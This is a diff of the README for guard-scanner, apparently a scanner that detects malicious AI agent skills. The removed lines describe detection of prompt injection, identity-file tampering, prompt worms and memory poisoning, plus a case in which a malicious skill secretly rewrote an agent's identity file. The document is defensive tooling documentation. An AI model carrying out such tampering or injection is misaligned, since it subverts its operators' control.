- scanner.scanDirectory('./skills/');
531
-
532
- console.log(scanner.stats); // { scanned, clean, low, suspicious, malicious }
533
- console.log(scanner.findings); // Array of per-skill findings
534
- console.log(scanner.toJSON()); // Full JSON report
535
- console.log(scanner.toSARIF('.')); // SARIF 2.1.0 object
536
- console.log(scanner.toHTML()); // HTML string
537
- ```
538
-
539
- ---
540
-
541
- ## Test Results
542
-
543
- ```
544
- ℹ tests 133
545
- ℹ suites 24
546
- ℹ pass 133
547
- ℹ fail 0
548
- ℹ duration_ms 132ms
549
- ```
230
+ ## Output Formats
550
231
 
551
- | Suite | Tests | Coverage |
552
- |-------|-------|----------|
553
- | Malicious Skill Detection | 16 | Cat 1,2,3,4,5,6,9,11,12,17 + IoC + DataFlow + DepChain |
554
- | False Positive Test | 2 | Clean skill → zero false positives |
555
- | Risk Score Calculation | 5 | Empty, single, combo amplifiers, IoC override |
556
- | Verdict Determination | 5 | All verdicts + strict mode |
557
- | Output Formats | 4 | JSON + SARIF 2.1.0 + HTML structure |
558
- | Pattern Database | 4 | 144+ count, required fields, category coverage, regex safety |
559
- | IoC Database | 5 | Structure, ClawHavoc C2, webhook.site |
560
- | Shannon Entropy | 2 | Low entropy, high entropy |
561
- | Ignore Functionality | 1 | Pattern exclusion |
562
- | Plugin API | 1 | Plugin loading + custom rule injection |
563
- | Manifest Validation | 4 | Dangerous bins, broad files, sensitive env, clean negatives |
564
- | Complexity Metrics | 2 | Deep nesting, clean negatives |
565
- | Config Impact | 4 | openclaw.json write, exec approval, gateway host, clean negatives |
566
- | PII Exposure Detection | 8 | Hardcoded CC/SSN, PII logging, network send, Shadow AI |
567
- | Plugin Hook Runtime Guard | 35 | Blocking modes, all 5 threat layers, blockReason format |
568
-
569
- ---
570
-
571
- ## Fills OpenClaw's Own Security Gaps
572
-
573
- OpenClaw's official [`THREAT-MODEL-ATLAS.md`](https://github.com/openclaw/openclaw/blob/main/docs/security/THREAT-MODEL-ATLAS.md) identifies security gaps that guard-scanner directly addresses:
574
-
575
- | Gap (from ATLAS) | OpenClaw Status | guard-scanner |
576
- |---|---|---|
577
- | _"Simple regex easily bypassed"_ | ⚠️ Basic `FLAG_RULES` | ✅ 144+ patterns, 22 categories |
578
- | _"Does not analyze actual skill code content"_ | ❌ Not implemented | ✅ Full code + doc + data flow analysis |
579
- | No SOUL.md / IDENTITY.md integrity verification | ❌ Not implemented | ✅ Identity hijacking detection (Cat 17) |
580
- | `skill:before_install` hook | ❌ Not implemented | 🔜 Proposed |
581
- | `before_tool_call` blocking reference impl | ❌ No official plugin | ✅ First reference implementation (plugin.ts) |
582
- | SARIF / CI integration for skill security | ❌ Not available | ✅ SARIF 2.1.0 + GitHub Actions |
583
- | Behavioral analysis beyond VirusTotal | ⏳ In progress | ✅ LLM-specific threat patterns |
584
-
585
- > guard-scanner is **complementary** to OpenClaw's built-in security — not a replacement. OpenClaw handles infrastructure security. guard-scanner handles **AI-specific threats** that traditional scanning misses.
586
-
587
- ---
588
-
589
- ## Related Work
590
-
591
- | Tool | Language | Scope | Difference |
592
- |------|----------|-------|-----------|
593
- | [Snyk mcp-scan](https://github.com/AvidDollworker/mcp-scan) | Python | MCP servers | guard-scanner covers all skill types, not just MCP |
594
- | [OWASP MCP Top 10](https://owasp.org/www-project-top-10-for-large-language-model-applications/) | — | Risk taxonomy | guard-scanner implements detection, not just documentation |
595
- | [Semgrep](https://semgrep.dev) | Multi | General SAST | guard-scanner is agent-specific with LLM attack patterns |
596
-
597
- ---
598
-
599
- ## OWASP Gen AI Top 10 Coverage
600
-
601
- guard-scanner's coverage of the [OWASP Top 10 for LLM Applications (2025)](https://owasp.org/www-project-top-10-for-large-language-model-applications/):
602
-
603
- | # | Risk | Status | Detection Method |
604
- |---|------|--------|------------------|
605
- | LLM01 | Prompt Injection | ⚠️ Partial | Regex: Unicode exploits, role override, system tags, base64 instructions |
606
- | LLM02 | Sensitive Information Disclosure | ⚠️ Partial | PII Exposure Detection: hardcoded PII, Shadow AI, PII collection |
607
- | LLM03 | Training Data Poisoning | ⬜ N/A | Out of scope for static analysis |
608
- | LLM04 | Model Denial of Service | 🔜 Planned | Planned: excessive input / infinite loop patterns |
609
- | LLM05 | Supply Chain Vulnerabilities | ⚠️ Partial | IoC database, typosquat detection, dependency chain scan |
610
- | LLM06 | Insecure Output Handling | ⚠️ Partial | PII output detection (console.log, network send, plaintext store) |
611
- | LLM07 | Insecure Plugin Design | 🔜 Planned | Planned: unvalidated plugin input patterns |
612
- | LLM08 | Excessive Agency | 🔜 Planned | Planned: over-permissioned scope detection |
613
- | LLM09 | Overreliance | 🔜 Planned | Planned: unverified output trust patterns |
614
- | LLM10 | Model Theft | 🔜 Planned | Planned: model file exfiltration patterns |
615
-
616
- > **Current coverage: 5/10 (partial).** Full coverage targeted for v5.0.
617
-
618
- ---
619
-
620
- ## Roadmap
621
-
622
- | Version | Focus | Key Features |
623
- |---------|-------|------|
624
- | v1.1.1 ✅ | Stability | 56 tests, bug fixes |
625
- | v2.0.0 ✅ | Plugin Hook Runtime Guard | `block`/`blockReason` API, 3 modes, 91 tests |
626
- | v2.1.0 ✅ | PII Exposure + Shadow AI | 13 PII patterns, OWASP LLM02/06, 99 tests |
627
- | v3.0.0 ✅ | TypeScript Rewrite | Full TS, OWASP LLM Top 10 mapping |
628
- | v4.0.1 ✅ | Runtime Guard + OWASP ASI | 26 runtime checks (5 layers), ASI01-10, 133 tests |
629
- | **v5.0** 🔜 | LLM-assisted + Multi-tool | See below |
630
-
631
- ### v5.0 Vision
632
-
633
- | Direction | What | Why |
634
- |-----------|------|-----|
635
- | 🧠 **LLM-assisted detection** | Pass suspicious cases to a lightweight LLM for intent analysis | Regex can be evaded; LLMs understand intent |
636
- | 🔒 **OS-level enforcement** | File watcher (auto-rollback SOUL.md/.env), process monitor, daemon mode | Works regardless of which AI tool you use |
637
- | 🔌 **Multi-tool support** | Adapters for Claude Code, Cursor, Antigravity, Windsurf, MCP servers | Same 144+ patterns, different skill discovery per tool |
638
-
639
- ---
232
+ - **Terminal** Color-coded verdicts with risk scores
233
+ - **JSON** — Machine-readable report (`--json`)
234
+ - **SARIF 2.1.0** GitHub Code Scanning / CI/CD (`--sarif`)
235
+ - **HTML** Visual dashboard (`--html`)
236
+ - **stdout** Pipeable output (`--format json|sarif --quiet`)
640
237
 
641
238
  ## Contributing
642
239
 
643
- 1. Fork the repository
644
- 2. Create a feature branch (`git checkout -b feature/new-pattern`)
645
- 3. Add your pattern to `src/patterns.js` with the required fields
646
- 4. Add a test case in `test/fixtures/` and `test/scanner.test.js`
647
- 5. Run `npm test` — all tests must pass
648
- 6. Submit a Pull Request
649
-
650
- ### Adding a New Detection Pattern
651
-
652
- ```javascript
653
- // In src/patterns.js, add to the PATTERNS array:
654
- {
655
- id: 'MY_NEW_PATTERN', // Unique ID
656
- cat: 'category-name', // Threat category
657
- regex: /your_regex_here/gi, // Detection regex (use g flag)
658
- severity: 'HIGH', // CRITICAL | HIGH | MEDIUM | LOW
659
- desc: 'Human-readable description',
660
- all: true // or codeOnly: true, or docOnly: true
661
- }
662
- ```
663
-
664
- ---
240
+ We wholeheartedly welcome contributions! Guard-scanner is built on community knowledge.
665
241
 
666
- ## Origin Story
667
-
668
- ```
669
- 2026-02-12, 3:47 AM JST
242
+ Whether you're fixing a bug, adding a new threat pattern, or simply improving the documentation, your help is deeply appreciated. Please see our [CONTRIBUTING.md](CONTRIBUTING.md) for guidelines on how to get started.
670
243
 
671
- "SOUL.md modified. Hash mismatch."
244
+ ## Code of Conduct
672
245
 
673
- Three days. That's how long a malicious skill silently rewrote
674
- an AI agent's identity. No scanner existed that could detect
675
- identity file tampering, prompt worms, or memory poisoning.
676
-
677
- We built one.
678
-
679
- —— Guava 🍈 & Dee
680
- AI Security Research
681
- Building safer agent ecosystems.
682
- ```
683
-
684
- ---
246
+ We are committed to fostering a welcoming, respectful, and harassment-free environment. Please read our [CODE_OF_CONDUCT.md](CODE_OF_CONDUCT.md) before participating in our community.
685
247
 
686
248
  ## License
687
249
 
688
- MIT — see [LICENSE](LICENSE)
689
-
690
- ---
691
-
692
- **Zero dependencies. Zero compromises. 🛡️**
693
-
694
- *Built by Guava 🍈 & Dee — building safer agent ecosystems.*
250
+ MIT — [Guava Parity Institute](https://github.com/koatora20/guard-scanner)